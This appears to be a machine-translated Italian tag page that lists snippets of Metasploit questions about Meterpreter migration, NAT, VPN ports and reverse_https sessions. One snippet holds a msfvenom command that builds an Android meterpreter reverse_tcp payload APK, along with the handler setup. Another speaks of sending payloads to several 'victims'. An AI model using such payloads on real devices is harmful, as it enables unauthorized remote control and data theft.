Domande con tag 'metasploit'

domande con tag
1
risposta

Esegui manualmente la migrazione a un altro processo senza utilizzare metasploit? [duplicare]

C'è uno script meterpreter utile che consente di migrare meterpreter in un altro processo specificando il suo PID. Immagina di avere la mia sessione in esecuzione. Come posso migrare a un altro processo senza usare metasploit? So che la domand...
posta 23.10.2016 - 15:58
0
risposte

Metasploit per connettersi a una destinazione dietro NAT

Durante un pentest e ho avuto uno strano problema con la connessione alla macchina target che si trova dietro una rete NAT lo scenario è fondamentalmente, hanno un IP pubblico: 1.1.1.1 e ci sono più macchine nella rete con IP 172.16.2.0/24...
posta 14.09.2016 - 13:29
0
risposte

payload Metasploit con VPN o proxy?

Ho acquistato VPN con torguard e ho chiesto loro di inoltrare le porte. Eseguo un test sull'IP VPN e sulle porte specificate, e le porte vengono chiuse, ma dicono diversamente nell'interfaccia. Comunque creo un payload con Msfvenom usando LHOST...
posta 07.09.2016 - 09:50
1
risposta

Connessioni Meterpreter

Se ho impostato un payload meterpreter reverse_https e inviato a più destinazioni e loro eseguono il payload senza che il gestore sia in esecuzione, quando installo il gestore si collegheranno o devo fare in modo che il gestore sia sempre in ese...
posta 25.09.2016 - 18:02
0
risposte

Collegamento del tester della sessione orfana / senza orario

Ho problemi con meterpreter reverse_https. Nel mio impegno, ho visto questo messaggio in console; "Aggiunta di misuratore di sessioni orfani / stageless" Ma dopo aver perso la connessione, la vittima si connette ancora e ancora e perdo ogni volt...
posta 27.05.2016 - 20:49
0
risposte

Android non connesso a kali linux con meterpreter in metasploit

Continuo a riscontrare un errore. Creo un apk: msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 R > test.apk Nella console, configuro il multi / handler: set PAYLOAD android/meterpreter/reverse_tcp set LHOST 10...
posta 09.05.2016 - 18:45
0
risposte

web view addjavascriptinterface exploit

Ho battuto la testa su questo per quasi 56 ore (+/- un paio che ho preso per avere un paio di sonnellini e RedBulls) e non sono stato in grado di arrivare da nessuna parte con esso finora. Sto cercando di capire l'addjavascriptinterface in We...
posta 23.06.2016 - 19:53
0
risposte

comando di ricerca metasploit per recuperare una E un'altra parola

C'è un modo per utilizzare la console metasploit per cercare esclusivamente 2 parole? Ad esempio: search X and Y // Non so se la sintassi è questa, naturalmente In un modo che restituisce solo gli exploit che hanno sia X che...
posta 27.03.2016 - 04:20
1
risposta

I comandi Stdapi non vengono visualizzati nella sessione meterpreter

Ho creato un payload Android con IP pubblico ( android/meterpreter/reverse_https ). I comandi stdapi ( ls , cd , webcam_snap ecc) vengono visualizzati quando la vittima si trova nella stessa rete. Tuttavia, quando provo a con...
posta 15.08.2016 - 18:25
0
risposte

Database di traffico malevolo crittografato

Stavo lavorando a un piccolo progetto di ricerca per identificare correttamente il modello di traffico crittografato generato da vari strumenti / applicazioni, ad esempio metasploit (o aumentare il tasso di successo). Ho eseguito alcuni exploit...
posta 09.03.2016 - 20:27